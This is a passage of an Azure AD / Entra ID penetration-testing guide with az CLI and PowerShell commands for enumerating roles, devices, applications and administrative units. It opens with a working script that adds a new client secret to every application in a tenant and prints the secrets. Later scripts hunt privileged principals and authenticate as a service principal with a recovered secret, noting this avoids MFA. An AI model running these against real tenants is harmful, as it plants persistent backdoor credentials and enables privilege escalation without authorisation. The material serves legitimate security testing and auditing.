        https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http
#>

    [CmdletBinding()]
    param(
        [Parameter(Mandatory=$True)]
        [String]
        $GraphToken = $null
    )

    $AppList = $null
    $AppPassword = $null

    # List All the Applications
    $Params = @{
        "URI"     = "https://graph.microsoft.com/v1.0/applications"
        "Method"  = "GET"
        "Headers" = @{
            "Content-Type"  = "application/json"
            "Authorization" = "Bearer $GraphToken"
        }
    }

    try
    {
        $AppList = Invoke-RestMethod @Params -UseBasicParsing
    }
    catch
    {
    }

    # Add Password in the Application
    if($AppList -ne $null)
    {
        [System.Collections.ArrayList]$Details = @()

        foreach($App in $AppList.value)
        {
            $ID = $App.ID
            $psobj = New-Object PSObject

            $Params = @{
                "URI"     = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
                "Method"  = "POST"
                "Headers" = @{
                    "Content-Type"  = "application/json"
                    "Authorization" = "Bearer $GraphToken"
                }
            }

            $Body = @{
                "passwordCredential" = @{
                    "displayName" = "Password"
                }
            }

            try
            {
                # secretText is only returned by this call; it cannot be read back later
                $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)
                Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID
                Add-Member -InputObject $psobj -NotePropertyName "App ID"    -NotePropertyValue $App.appId
                Add-Member -InputObject $psobj -NotePropertyName "App Name"  -NotePropertyValue $App.displayName
                Add-Member -InputObject $psobj -NotePropertyName "Key ID"    -NotePropertyValue $AppPassword.keyId
                Add-Member -InputObject $psobj -NotePropertyName "Secret"    -NotePropertyValue $AppPassword.secretText
                $Details.Add($psobj) | Out-Null
            }
            catch
            {
                Write-Output "Failed to add new client secret to '$($App.displayName)' Application."
            }
        }

        if($Details -ne $null)
        {
            Write-Output ""
            Write-Output "Client secret added to : "
            Write-Output $Details | fl *
        }
    }
    else
    {
        Write-Output "Failed to Enumerate the Applications."
    }
}
```

</details>

### Roles

<div data-gb-custom-block data-tag="tabs"></div>

<div data-gb-custom-block data-tag="tab" data-title='az cli'>

```bash
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"
```


```powershell
# Get all available role templates
Get-AzureADDirectoryroleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *
```

```powershell
# Get role definitions available in the subscription
Get-AzRoleDefinition
# Get Role definition
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get roles of a user or resource
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>
# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value
```
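The commands above return assignments one principal or one scope at a time. The following is an added example, not code from the original page, that walks every RBAC assignment in the current subscription and flags the ones an attacker would look for first: privileged built-in roles (Owner, Contributor, User Access Administrator) held by a service principal, or granted at subscription or root scope, and group-based assignments expanded to their members. It assumes an existing `Connect-AzAccount` session and the Az.Resources module; the role list and the scope-depth heuristic are the author's choices.

```powershell
# Added example: hunt for over-privileged RBAC assignments with Az PowerShell.
# Assumes Connect-AzAccount has already been run.
Import-Module Az.Resources

# Built-in roles that give write or delegation rights over everything in scope (assumption: the ones worth flagging)
$PrivilegedRoles = @('Owner', 'Contributor', 'User Access Administrator')

function Find-PrivilegedAssignment {
    param([string[]]$Roles = $PrivilegedRoles)

    Get-AzRoleAssignment | Where-Object { $Roles -contains $_.RoleDefinitionName } |
        ForEach-Object {
            # Scope depth heuristic: "/" (root / all subscriptions) -> 1 segment,
            # "/subscriptions/<id>" -> 2, resource group -> 4, a resource -> 8
            $depth = ($_.Scope.TrimStart('/') -split '/').Count
            [pscustomobject]@{
                Principal  = if ($_.SignInName) { $_.SignInName } else { $_.DisplayName }
                ObjectType = $_.ObjectType          # User, Group or ServicePrincipal
                Role       = $_.RoleDefinitionName
                Scope      = $_.Scope
                BroadScope = ($depth -le 2)         # root or whole subscription
                ObjectId   = $_.ObjectId
            }
        }
}

# 1) Service principals with a privileged role over the whole subscription:
#    no MFA, no risk score, and their credential is an app password or cert
Find-PrivilegedAssignment |
    Where-Object { $_.ObjectType -eq 'ServicePrincipal' -and $_.BroadScope } |
    Format-Table Principal, Role, Scope -AutoSize

# 2) Privileged roles held through a group: every member of the group holds the role
Find-PrivilegedAssignment | Where-Object { $_.ObjectType -eq 'Group' } | ForEach-Object {
    $g = $_
    Get-AzADGroupMember -GroupObjectId $g.ObjectId | ForEach-Object {
        [pscustomobject]@{ Group = $g.Principal; Member = $_.DisplayName; Role = $g.Role; Scope = $g.Scope }
    }
} | Format-Table -AutoSize
```

`Get-AzRoleAssignment` with no parameters only covers the subscription currently selected with `Set-AzContext`; loop over `Get-AzSubscription` to cover a whole tenant.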

### Devices

```bash
# If you know how to do this send a PR!
```


```powershell
# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Registered users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Get devices managed using Intune
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get Administrative Units of a device
$deviceObjId = "<device_object_id>"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }
```

If a device (VM) is Azure AD joined, users from Azure AD will be able to log in to it. Moreover, if the logged-in user is an Owner of the device, they will be a local administrator on it.
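Because the registered owner of a joined device is local admin on it, the devices owned by holders of privileged directory roles are the high-value ones (compromising one yields a privileged user's session). The following added example, not from the original page, cross-references device owners with the members of a few privileged roles using the AzureAD module. It assumes `Connect-AzureAD` has been run; the role list is the author's choice and only activated roles are returned by `Get-AzureADDirectoryRole`.

```powershell
# Added example: which devices are owned by privileged role holders?
# Assumes Connect-AzureAD has already been run.
Import-Module AzureAD

function Get-PrivilegedDeviceOwner {
    param(
        # Assumption: the roles considered privileged for this check
        [string[]]$RoleNames = @('Global Administrator', 'Privileged Role Administrator', 'Security Administrator')
    )

    # Build ObjectId -> role name for every member of the roles of interest.
    # Get-AzureADDirectoryRole only lists roles that have been activated (assigned at least once).
    $privileged = @{}
    Get-AzureADDirectoryRole | Where-Object { $RoleNames -contains $_.DisplayName } | ForEach-Object {
        $roleName = $_.DisplayName
        Get-AzureADDirectoryRoleMember -ObjectId $_.ObjectId | ForEach-Object {
            $privileged[$_.ObjectId] = $roleName
        }
    }

    Get-AzureADDevice -All $true | ForEach-Object {
        $device = $_
        Get-AzureADDeviceRegisteredOwner -ObjectId $device.ObjectId | ForEach-Object {
            if ($privileged.ContainsKey($_.ObjectId)) {
                [pscustomobject]@{
                    Device    = $device.DisplayName
                    DeviceId  = $device.DeviceId
                    TrustType = $device.DeviceTrustType   # AzureAd = joined, Workplace = registered, ServerAd = hybrid joined
                    OS        = "$($device.DeviceOSType) $($device.DeviceOSVersion)"
                    LastLogon = $device.ApproximateLastLogonTimeStamp
                    Owner     = $_.UserPrincipalName
                    OwnerRole = $privileged[$_.ObjectId]
                }
            }
        }
    }
}

# Most recently used devices first: stale entries are less likely to still be reachable
Get-PrivilegedDeviceOwner | Sort-Object LastLogon -Descending | Format-Table -AutoSize
```

Only `TrustType` of `AzureAd` implies the owner-is-local-admin behaviour described above; `Workplace` (registered) devices do not grant local admin.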

### Applications

Applications are App Registrations in the portal (not Enterprise Applications). But each App Registration will create an Enterprise Application (Service Principal) with the same name. Moreover, if the App is a multi-tenant App, another Enterprise Application (Service Principal) will be created in each tenant that uses it, with the same name.

When an Application is created, 2 types of permissions are granted:

  • Permissions given to the Service Principal

  • Permissions the application can have and use on behalf of the user.

```bash
# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad app list --query "[?keyCredentials != null].displayName"
```


```powershell
# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id>  | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *
```

</div>

```powershell
# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential
```

An Application holding the `AppRoleAssignment.ReadWrite.All` Graph permission can escalate to Global Admin by granting itself that role. For more information check here.

The secret string that an application uses to prove its identity when requesting a token is the application password. So, if you find this password you can access the tenant as that service principal. Note that the password is only shown when it is generated (you can add a new one, but you cannot read an existing one back). The owner of an application can add a password to it (and therefore impersonate it). Logins as these service principals are not flagged as risky and are not subject to MFA.
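Two things a practitioner wants from the paragraph above: which registered apps carry password credentials (and who owns them), and what a recovered client secret actually buys. The following added example, not from the original page, does both with the AzureAD module and a raw OAuth 2.0 client_credentials request. It assumes `Connect-AzureAD` has been run; `<tenant_id>`, `<app_id>` and `<secret>` are placeholders you fill in.

```powershell
# Added example: audit app password credentials, then authenticate as the SP with a known secret.
# Assumes Connect-AzureAD has already been run.
Import-Module AzureAD

function Get-AppCredentialAudit {
    Get-AzureADApplication -All $true | ForEach-Object {
        $app    = $_
        $owners = (Get-AzureADApplicationOwner -ObjectId $app.ObjectId).UserPrincipalName -join ','
        # Only metadata is returned: the secret value itself is never retrievable
        Get-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId | ForEach-Object {
            [pscustomobject]@{
                App        = $app.DisplayName
                AppId      = $app.AppId
                KeyId      = $_.KeyId
                StartDate  = $_.StartDate
                EndDate    = $_.EndDate
                # Long-lived secrets are the usual persistence artefact; sort on this
                YearsValid = [math]::Round(($_.EndDate - $_.StartDate).TotalDays / 365, 1)
                Owners     = $owners
            }
        }
    }
}

Get-AppCredentialAudit | Sort-Object YearsValid -Descending | Format-Table -AutoSize

function Get-SpGraphToken {
    param(
        [Parameter(Mandatory)][string]$TenantId,
        [Parameter(Mandatory)][string]$ClientId,      # the AppId (client id), not the ObjectId
        [Parameter(Mandatory)][string]$ClientSecret   # the application password
    )
    $body = @{
        client_id     = $ClientId
        client_secret = $ClientSecret
        scope         = 'https://graph.microsoft.com/.default'   # all application permissions already granted to the SP
        grant_type    = 'client_credentials'
    }
    # v2.0 token endpoint: no user, so no MFA and no Identity Protection sign-in risk evaluation
    $resp = Invoke-RestMethod -Method Post -Uri "https://login.microsoftonline.com/$TenantId/oauth2/v2.0/token" -Body $body
    $resp.access_token
}

# Usage with placeholders:
# $Token = Get-SpGraphToken -TenantId '<tenant_id>' -ClientId '<app_id>' -ClientSecret '<secret>'
# Invoke-RestMethod -Uri 'https://graph.microsoft.com/v1.0/applications' -Headers @{ Authorization = "Bearer $Token" }
```

The token returned carries only the application permissions that were granted (and admin-consented) to the service principal; decode its `roles` claim to see what the SP can actually do before enumerating further.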

### Difference between Application and (Enterprise Applications or Service Principal)

Difference between an Application and a Service Principal in Azure:

  • Application/App Registrations: The applications that exist in your Azure AD

  • (Get-AzureADApplication -Filter "DisplayName eq 'testapp'")

  • Service Principal/Enterprise Applications: Security objects in your Azure AD that can hold permissions in Azure Resource Manager and are linked to your application or to a third-party application

  • (Get-AzureADServicePrincipal -Filter "DisplayName eq 'testapp'")

  • An admin may need to approve the permissions granted if they are very sensitive.

An application could be running in a third-party tenant; once you start using it and grant it access, a Service Principal/Enterprise Application is created in your tenant to give it access to the information it needs.

### Administrative Units

Used for better management of users.

Administrative units restrict the permissions of a role to any portion of your organization that you define. You could, for example, use administrative units to delegate the Helpdesk Administrator role to regional support specialists, so they can manage users only in the region they support.

Therefore, you can assign a role scoped to an administrative unit; the assignee then holds that role only over the unit's members (users, groups and devices).
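For an attacker this means a scoped Helpdesk or User Administrator can reset passwords of every user in their unit, so the question is who holds which role over which unit, and which units contain the target. The following added example, not from the original page, answers both with the AzureADPreview (`*MS*`) cmdlets. It assumes `Connect-AzureAD` has been run with the AzureADPreview module loaded; `<target_object_id>` is a placeholder.

```powershell
# Added example: scoped role holders per administrative unit, and AU membership of a given object.
# Assumes Connect-AzureAD (AzureADPreview module) has already been run.
Import-Module AzureADPreview

function Get-AdminUnitScopedRoles {
    Get-AzureADMSAdministrativeUnit | ForEach-Object {
        $au      = $_
        $members = @(Get-AzureADMSAdministrativeUnitMember -Id $au.Id)
        Get-AzureADMSScopedRoleMembership -Id $au.Id | ForEach-Object {
            # RoleId is the object id of the activated directoryRole, so resolve its display name
            $role = Get-AzureADDirectoryRole -ObjectId $_.RoleId
            [pscustomobject]@{
                AdminUnit   = $au.DisplayName
                AdminUnitId = $au.Id
                Role        = $role.DisplayName
                Holder      = $_.RoleMemberInfo.DisplayName
                HolderUpn   = $_.RoleMemberInfo.UserPrincipalName
                HolderId    = $_.RoleMemberInfo.Id
                MemberCount = $members.Count
            }
        }
    }
}

# Which units (and therefore which scoped admins) cover a specific user, group or device?
function Get-AdminUnitsForObject {
    param([Parameter(Mandatory)][string]$ObjectId)
    Get-AzureADMSAdministrativeUnit | Where-Object {
        @(Get-AzureADMSAdministrativeUnitMember -Id $_.Id | ForEach-Object { $_.Id }) -contains $ObjectId
    } | Select-Object Id, DisplayName
}

Get-AdminUnitScopedRoles | Sort-Object AdminUnit, Role | Format-Table -AutoSize
Get-AdminUnitsForObject -ObjectId '<target_object_id>'
```

Scoped role memberships are separate from tenant-wide role assignments: a user who appears here with "User Administrator" does not show up in `Get-AzureADDirectoryRoleMember` for that role, which is why both enumerations are needed.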


```powershell
# Get Administrative Units
Get-AzureADMSAdministrativeUnit
Get-AzureADMSAdministrativeUnit -Id <id>
# Get ID of admin unit by string
$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'"
# List the users, groups, and devices affected by the administrative unit
Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
```

## Azure AD Identity Protection (AIP)

Azure AD Identity Protection (AIP) is a security service that uses automated detection and remediation to help protect user identities in Azure Active Directory from being compromised. AIP monitors and evaluates the risk of user sign-ins and identity configurations, then automatically applies appropriate security measures, such as requiring multi-factor authentication or blocking risky activities. This helps organizations prevent identity-based security breaches.

Process:

  1. Azure AD Identity Protection monitors user activity and collects data about sign-ins, authentication events, and other relevant activities.

  2. The service uses machine learning algorithms to analyse this data and detect potential security threats.

  3. Azure AD Identity Protection assigns a risk level to the threat (e.g. the sign-in) and raises an alert if automatic action is required.

## Azure AD Password Protection (APP)

Azure AD Password Protection (APP) is a security feature that helps prevent weak passwords in Azure Active Directory by enforcing strong password policies. APP blocks commonly used weak passwords and their variants, reducing the risk of password-related breaches. It can be applied both in the cloud and to on-premises Active Directory, improving overall password security in the organization.

## References
